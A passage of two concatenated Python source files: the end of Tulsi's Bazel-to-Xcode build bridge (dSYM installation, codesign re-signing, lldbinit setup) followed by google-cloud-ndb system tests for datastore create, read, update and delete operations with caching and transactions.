(filename, bundle_subpath))
dir_components = self._SplitPathComponents(filename)
# Get the file's path, ignoring the payload components if the archive
# is an IPA.
if is_ipa:
subpath = os.path.join(*dir_components[2:])
else:
subpath = os.path.join(*dir_components[1:])
target_path = os.path.join(output_path, subpath)
# Ensure the target directory exists.
try:
target_dir = os.path.dirname(target_path)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
except OSError as e:
_PrintXcodeError(
'Failed to create target path "%s" during extraction. %s' % (
target_path, e))
return 671
# If the archive item looks like a file, extract it.
if not filename.endswith(os.sep):
with zf.open(item) as src, file(target_path, 'wb') as dst:
shutil.copyfileobj(src, dst)
# Patch up the extracted file's attributes to match the zip content.
if attributes:
os.chmod(target_path, attributes)
return 0
def _InstallDSYMBundles(self, output_dir, outputs_data):
"""Copies any generated dSYM bundles to the given directory."""
dsym_to_process = set()
primary_output_data = outputs_data[0]
if primary_output_data['has_dsym']:
# Declares the Xcode-generated name of our main target's dSYM.
# This environment variable is always set, for any possible Xcode output
# that could generate a dSYM bundle.
#
# Note that this may differ from the Bazel name as Tulsi may modify the
# Xcode `BUNDLE_NAME`, so we need to make sure we use Bazel as the source
# of truth for Bazel's dSYM name, but copy it over to where Xcode expects.
xcode_target_dsym = os.environ.get('DWARF_DSYM_FILE_NAME')
if xcode_target_dsym:
dsym_path = primary_output_data.get('dsym_path')
if dsym_path:
dsym_to_process.add((dsym_path, xcode_target_dsym))
else:
_PrintXcodeWarning('Unable to resolve dSYM paths for main bundle %s' %
primary_output_data)
# Collect additional dSYM bundles generated by the dependencies of this
# build such as extensions or frameworks. Note that a main target may not
# have dSYMs while subtargets (like an xctest) still can have them.
child_dsyms = set()
for data in outputs_data:
for bundle_info in data.get('embedded_bundles', []):
if not bundle_info['has_dsym']:
continue
dsym_path = bundle_info.get('dsym_path')
if dsym_path:
child_dsyms.add((dsym_path, os.path.basename(dsym_path)))
else:
_PrintXcodeWarning(
'Unable to resolve dSYM paths for embedded bundle %s'
% bundle_info)
dsym_to_process.update(child_dsyms)
if not dsym_to_process:
return 0, None
# Start the timer now that we know we have dSYM bundles to install.
timer = Timer('Installing dSYM bundles', 'installing_dsym').Start()
dsyms_found = []
for input_dsym_full_path, xcode_dsym_name in dsym_to_process:
output_full_path = os.path.join(output_dir, xcode_dsym_name)
exit_code, path = self._InstallBundle(input_dsym_full_path,
output_full_path)
if exit_code:
_PrintXcodeWarning('Failed to install dSYM to "%s" (%s)'
% (input_dsym_full_path, exit_code))
elif path is None:
_PrintXcodeWarning('Did not find a dSYM bundle at %s'
% input_dsym_full_path)
else:
dsyms_found.append(path)
timer.End()
return 0, dsyms_found
def _ResignBundle(self, bundle_path, signing_identity, entitlements=None):
"""Re-signs the bundle with the given signing identity and entitlements."""
if not self.codesigning_allowed:
return 0
timer = Timer('\tSigning ' + bundle_path, 'signing_bundle').Start()
command = [
'xcrun',
'codesign',
'-f',
'--timestamp=none',
'-s',
signing_identity,
]
if entitlements:
command.extend(['--entitlements', entitlements])
else:
command.append('--preserve-metadata=entitlements')
command.append(bundle_path)
returncode, output = self._RunSubprocess(command)
timer.End()
if returncode:
_PrintXcodeError('Re-sign command %r failed. %s' % (command, output))
return 800 + returncode
return 0
def _ResignTestArtifacts(self):
"""Resign test related artifacts that Xcode injected into the outputs."""
if not self.is_test:
return 0
# Extract the signing identity from the bundle at the expected output path
# since that's where the signed bundle from bazel was placed.
signing_identity = self._ExtractSigningIdentity(self.artifact_output_path)
if not signing_identity:
return 800
exit_code = 0
timer = Timer('Re-signing injected test host artifacts',
'resigning_test_host').Start()
if self.test_host_binary:
# For Unit tests, we need to resign the frameworks that Xcode injected
# into the test host bundle.
test_host_bundle = os.path.dirname(self.test_host_binary)
exit_code = self._ResignXcodeTestFrameworks(
test_host_bundle, signing_identity)
else:
# For UI tests, we need to resign the UI test runner app and the
# frameworks that Xcode injected into the runner app. The UI Runner app
# also needs to be signed with entitlements.
exit_code = self._ResignXcodeTestFrameworks(
self.codesigning_folder_path, signing_identity)
if exit_code == 0:
entitlements_path = self._InstantiateUIRunnerEntitlements()
if entitlements_path:
exit_code = self._ResignBundle(
self.codesigning_folder_path,
signing_identity,
entitlements_path)
else:
_PrintXcodeError('Could not instantiate UI runner entitlements.')
exit_code = 800
timer.End()
return exit_code
def _ResignXcodeTestFrameworks(self, bundle, signing_identity):
"""Re-signs the support frameworks injected by Xcode in the given bundle."""
if not self.codesigning_allowed:
return 0
for framework in XCODE_INJECTED_FRAMEWORKS:
framework_path = os.path.join(
bundle, 'Frameworks', framework)
if os.path.isdir(framework_path) or os.path.isfile(framework_path):
exit_code = self._ResignBundle(framework_path, signing_identity)
if exit_code != 0:
return exit_code
return 0
def _InstantiateUIRunnerEntitlements(self):
"""Substitute team and bundle identifiers into UI runner entitlements.
This method throws an IOError exception if the template wasn't found in
its expected location, or an OSError if the expected output folder could
not be created.
Returns:
The path to where the entitlements file was generated.
"""
if not self.codesigning_allowed:
return None
if not os.path.exists(self.derived_sources_folder_path):
os.makedirs(self.derived_sources_folder_path)
output_file = os.path.join(
self.derived_sources_folder_path,
self.bazel_product_name + '_UIRunner.entitlements')
if os.path.exists(output_file):
os.remove(output_file)
with open(self.runner_entitlements_template, 'r') as template:
contents = template.read()
contents = contents.replace(
'$(TeamIdentifier)',
self._ExtractSigningTeamIdentifier(self.artifact_output_path))
contents = contents.replace(
'$(BundleIdentifier)',
self._ExtractSigningBundleIdentifier(self.artifact_output_path))
with open(output_file, 'w') as output:
output.write(contents)
return output_file
def _ExtractSigningIdentity(self, signed_bundle):
"""Returns the identity used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Authority')
def _ExtractSigningTeamIdentifier(self, signed_bundle):
"""Returns the team identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'TeamIdentifier')
def _ExtractSigningBundleIdentifier(self, signed_bundle):
"""Returns the bundle identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Identifier')
def _ExtractSigningAttribute(self, signed_bundle, attribute):
"""Returns the attribute used to sign the given bundle path."""
if not self.codesigning_allowed:
return '<CODE_SIGNING_ALLOWED=NO>'
cached = self.codesign_attributes.get(signed_bundle)
if cached:
return cached.Get(attribute)
timer = Timer('\tExtracting signature for ' + signed_bundle,
'extracting_signature').Start()
output = subprocess.check_output(['xcrun',
'codesign',
'-dvv',
signed_bundle],
stderr=subprocess.STDOUT)
timer.End()
bundle_attributes = CodesignBundleAttributes(output)
self.codesign_attributes[signed_bundle] = bundle_attributes
return bundle_attributes.Get(attribute)
def _UpdateLLDBInit(self, clear_source_map=False):
"""Updates lldbinit to enable debugging of Bazel binaries."""
# An additional lldbinit file that we should load in the lldbinit file
# we are about to write.
additional_lldbinit = None
if self.custom_lldbinit is None:
# Write our settings to the global ~/.lldbinit-tulsiproj file when no
# custom lldbinit is provided.
lldbinit_file = TULSI_LLDBINIT_FILE
# Make sure a reference to ~/.lldbinit-tulsiproj exists in ~/.lldbinit or
# ~/.lldbinit-Xcode. Priority is given to ~/.lldbinit-Xcode if it exists,
# otherwise the bootstrapping will be written to ~/.lldbinit.
BootstrapLLDBInit(True)
else:
# Remove any reference to ~/.lldbinit-tulsiproj if the global lldbinit was
# previously bootstrapped. This prevents the global lldbinit from having
# side effects on the custom lldbinit file.
BootstrapLLDBInit(False)
# When using a custom lldbinit, Xcode will directly load our custom file
# so write our settings to this custom file. Retain standard Xcode
# behavior by loading the default file in our custom file.
lldbinit_file = self.custom_lldbinit
additional_lldbinit = _FindDefaultLldbInit()
project_basename = os.path.basename(self.project_file_path)
workspace_root = self._NormalizePath(self.workspace_root)
with open(lldbinit_file, 'w') as out:
out.write('# This file is autogenerated by Tulsi and should not be '
'edited.\n')
if additional_lldbinit is not None:
out.write('# This loads the default lldbinit file to retain standard '
'Xcode behavior.\n')
out.write('command source "%s"\n' % additional_lldbinit)
out.write('# This sets lldb\'s working directory to the Bazel workspace '
'root used by %r.\n' % project_basename)
out.write('platform settings -w "%s"\n' % workspace_root)
if clear_source_map:
out.write('settings clear target.source-map\n')
return 0
if self.normalized_prefix_map:
source_map = ('./', workspace_root)
out.write('# This maps the normalized root to that used by '
'%r.\n' % project_basename)
else:
# NOTE: settings target.source-map is different from
# DBGSourcePathRemapping; the former is an LLDB target-level
# remapping API that rewrites breakpoints, the latter is an LLDB
# module-level remapping API that changes DWARF debug info in memory.
#
# If we had multiple remappings, it would not make sense for the
# two APIs to share the same mappings. They have very different
# side-effects in how they individually handle debug information.
source_map = self._ExtractTargetSourceMap()
out.write('# This maps Bazel\'s execution root to that used by '
'%r.\n' % project_basename)
out.write('settings set target.source-map "%s" "%s"\n' % source_map)
return 0
def _DWARFdSYMBinaries(self, dsym_bundle_path):
"""Returns an array of abs paths to DWARF binaries in the dSYM bundle.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
Returns:
str[]: a list of strings representing the absolute paths to each binary
found within the dSYM bundle.
"""
dwarf_dir = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'DWARF')
dsym_binaries = []
for f in os.listdir(dwarf_dir):
# Ignore hidden files, such as .DS_Store files.
if not f.startswith('.'):
# Append full path info.
dsym_binary = os.path.join(dwarf_dir, f)
dsym_binaries.append(dsym_binary)
return dsym_binaries
def _UUIDInfoForBinary(self, source_binary_path):
"""Returns exit code of dwarfdump along with every UUID + arch found.
Args:
source_binary_path: absolute path to the binary file.
Returns:
(Int, str[(str, str)]): a tuple containing the return code of dwarfdump
as its first element, and a list of strings
representing each UUID found for each given
binary slice found within the binary with its
given architecture, if no error has occcured.
"""
returncode, output = self._RunSubprocess([
'xcrun',
'dwarfdump',
'--uuid',
source_binary_path
])
if returncode:
_PrintXcodeWarning('dwarfdump returned %d while finding the UUID for %s'
% (returncode, source_binary_path))
return (returncode, [])
# All UUIDs for binary slices will be returned as the second from left,
# from output; "UUID: D4DE5AA2-79EE-36FE-980C-755AED318308 (x86_64)
# /Applications/Calendar.app/Contents/MacOS/Calendar"
uuids_found = []
for dwarfdump_output in output.split('\n'):
if not dwarfdump_output:
continue
found_output = re.match(r'^(?:UUID: )([^ ]+) \(([^)]+)', dwarfdump_output)
if not found_output:
continue
found_uuid = found_output.group(1)
if not found_uuid:
continue
found_arch = found_output.group(2)
if not found_arch:
continue
uuids_found.append((found_uuid, found_arch))
return (0, uuids_found)
def _CreateUUIDPlist(self, dsym_bundle_path, uuid, arch, source_maps):
"""Creates a UUID.plist in a dSYM bundle to redirect sources.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
uuid: string representing the UUID of the binary slice with paths to
remap in the dSYM bundle.
arch: the architecture of the binary slice.
source_maps: list of tuples representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with the
paths to Xcode-visible sources used for the purposes of
Tulsi debugging as strings ($1).
Returns:
Bool: True if no error was found, or False, representing a failure to
write when creating the plist.
"""
# Create a UUID plist at (dsym_bundle_path)/Contents/Resources/.
remap_plist = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'%s.plist' % uuid)
# Via an XML plist, add the mappings from _ExtractTargetSourceMap().
try:
with open(remap_plist, 'w') as out:
out.write('<?xml version="1.0" encoding="UTF-8"?>\n'
'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
'<plist version="1.0">\n'
'<dict>\n'
'<key>DBGSourcePathRemapping</key>\n'
'<dict>\n')
for source_map in source_maps:
# Add the mapping as a DBGSourcePathRemapping to the UUID plist here.
out.write('<key>%s</key>\n<string>%s</string>\n' % source_map)
# Make sure that we also set DBGVersion to 3.
out.write('</dict>\n'
'<key>DBGVersion</key>\n'
'<string>3</string>\n'
'</dict>\n'
'</plist>\n')
except OSError as e:
_PrintXcodeError('Failed to write %s, received error %s' %
(remap_plist, e))
return False
# Update the dSYM symbol cache with a reference to this dSYM bundle.
err_msg = self.update_symbol_cache.UpdateUUID(uuid,
dsym_bundle_path,
arch)
if err_msg:
_PrintXcodeWarning('Attempted to save (uuid, dsym_bundle_path, arch) '
'to DBGShellCommands\' dSYM cache, but got error '
'\"%s\".' % err_msg)
return True
def _CleanExistingDSYMs(self):
"""Clean dSYM bundles that were left over from a previous build."""
output_dir = self.built_products_dir
output_dir_list = os.listdir(output_dir)
for item in output_dir_list:
if item.endswith('.dSYM'):
shutil.rmtree(os.path.join(output_dir, item))
def _PlistdSYMPaths(self, dsym_bundle_path):
"""Adds Plists to a given dSYM bundle to redirect DWARF data."""
# Retrieve the paths that we are expected to remap.
# Always include a direct path from the execroot to Xcode-visible sources.
source_maps = [self._ExtractTargetSourceMap()]
# Remap relative paths from the workspace root.
if self.normalized_prefix_map:
# Take the normalized path and map that to Xcode-visible sources.
source_maps.append(('./', self._NormalizePath(self.workspace_root)))
# Find the binaries within the dSYM bundle. UUIDs will match that of the
# binary it was based on.
dsym_binaries = self._DWARFdSYMBinaries(dsym_bundle_path)
if not dsym_binaries:
_PrintXcodeWarning('Could not find the binaries that the dSYM %s was '
'based on to determine DWARF binary slices to patch. '
'Debugging will probably fail.' % (dsym_bundle_path))
return 404
# Find the binary slice UUIDs with dwarfdump from each binary.
for source_binary_path in dsym_binaries:
returncode, uuid_info_found = self._UUIDInfoForBinary(source_binary_path)
if returncode:
return returncode
# Create a plist per UUID, each indicating a binary slice to remap paths.
for uuid, arch in uuid_info_found:
plist_created = self._CreateUUIDPlist(dsym_bundle_path,
uuid,
arch,
source_maps)
if not plist_created:
return 405
return 0
def _NormalizePath(self, path):
"""Returns paths with a common form, normalized with a trailing slash.
Args:
path: a file system path given in the form of a string.
Returns:
str: a normalized string with a trailing slash, based on |path|.
"""
return os.path.normpath(path) + os.sep
def _ExtractTargetSourceMap(self, normalize=True):
"""Extracts the source path as a tuple associated with the WORKSPACE path.
Args:
normalize: Defines if all paths should be normalized. Preferred for APIs
like DBGSourcePathRemapping and target.source-map but won't
work for the purposes of -fdebug-prefix-map.
Returns:
None: if an error occurred.
(str, str): a single tuple representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with
the paths to Xcode-visible sources used for the purposes
of Tulsi debugging as strings ($1).
"""
# All paths route to the "workspace root" for sources visible from Xcode.
sm_destpath = self.workspace_root
if normalize:
sm_destpath = self._NormalizePath(sm_destpath)
# Add a redirection for the Bazel execution root, the path where sources
# are referenced by Bazel.
sm_execroot = self.bazel_exec_root
if normalize:
sm_execroot = self._NormalizePath(sm_execroot)
return (sm_execroot, sm_destpath)
def _LinkTulsiToBazel(self, symlink_name, destination):
"""Links symlink_name (in project/.tulsi) to the specified destination."""
symlink_path = os.path.join(self.project_file_path,
'.tulsi',
symlink_name)
if os.path.islink(symlink_path):
os.unlink(symlink_path)
os.symlink(destination, symlink_path)
if not os.path.exists(symlink_path):
_PrintXcodeError(
'Linking %s to %s failed.' % (symlink_path, destination))
return -1
@staticmethod
def _SplitPathComponents(path):
"""Splits the given path into an array of all of its components."""
components = path.split(os.sep)
# Patch up the first component if path started with an os.sep
if not components[0]:
components[0] = os.sep
return components
def _RunSubprocess(self, cmd):
"""Runs the given command as a subprocess, returning (exit_code, output)."""
self._PrintVerbose('%r' % cmd, 1)
process = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, _ = process.communicate()
return (process.returncode, output)
def _PrintVerbose(self, msg, level=0):
if self.verbose > level:
_PrintUnbuffered(msg)
def main(argv):
build_settings = bazel_build_settings.BUILD_SETTINGS
if build_settings is None:
_Fatal('Unable to resolve build settings. Please report a Tulsi bug.')
return 1
return BazelBuildBridge(build_settings).Run(argv)
if __name__ == '__main__':
# Register the interrupt handler immediately in case we receive SIGINT while
# trying to acquire the lock.
signal.signal(signal.SIGINT, _InterruptHandler)
_LockFileAcquire(_LockFileCreate())
_logger = tulsi_logging.Logger()
logger_warning = tulsi_logging.validity_check()
if logger_warning:
_PrintXcodeWarning(logger_warning)
_timer = Timer('Everything', 'complete_build').Start()
_exit_code = main(sys.argv)
_timer.End()
sys.exit(_exit_code)
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is not None
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
